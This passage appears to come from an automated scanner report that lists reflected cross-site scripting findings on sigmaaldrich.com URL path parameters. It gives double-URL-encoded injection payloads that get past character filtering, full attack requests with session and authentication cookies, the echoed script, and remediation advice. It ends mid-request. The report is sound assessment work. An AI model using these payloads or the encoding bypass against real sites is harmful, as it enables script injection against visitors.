Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:11 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs55a88";alert(1)//b19bddf449c/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.287. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a08ef%2522%253balert%25281%2529%252f%252f320de9424a0 was submitted in the REST URL parameter 4. This input was echoed as a08ef";alert(1)//320de9424a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Flukaa08ef%2522%253balert%25281%2529%252f%252f320de9424a0/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:17 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Flukaa08ef";alert(1)//320de9424a0/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.288. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edcd5%2522%253balert%25281%2529%252f%252f3c310134b3c was submitted in the REST URL parameter 5. This input was echoed as edcd5";alert(1)//3c310134b3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Fluka/Brochureedcd5%2522%253balert%25281%2529%252f%252f3c310134b3c/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:22 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Fluka/Brochureedcd5";alert(1)//3c310134b3c/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.289. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a41ae%2522%253balert%25281%2529%252f%252f9a1a2a67ead was submitted in the REST URL parameter 6. This input was echoed as a41ae";alert(1)//9a1a2a67ead in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Fluka/Brochure/1a41ae%2522%253balert%25281%2529%252f%252f9a1a2a67ead/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:26 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Fluka/Brochure/1a41ae";alert(1)//9a1a2a67ead/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.290. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8b5%2522%253balert%25281%2529%252f%252f11678d7b36 was submitted in the REST URL parameter 7. This input was echoed as be8b5";alert(1)//11678d7b36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Fluka/Brochure/1/be8b5%2522%253balert%25281%2529%252f%252f11678d7b36/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:37 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Fluka/Brochure/1/be8b5";alert(1)//11678d7b36/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.291. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 155f6%2522%253balert%25281%2529%252f%252fe68f3e92fba was submitted in the REST URL parameter 1. This input was echoed as 155f6";alert(1)//e68f3e92fba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc155f6%2522%253balert%25281%2529%252f%252fe68f3e92fba/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
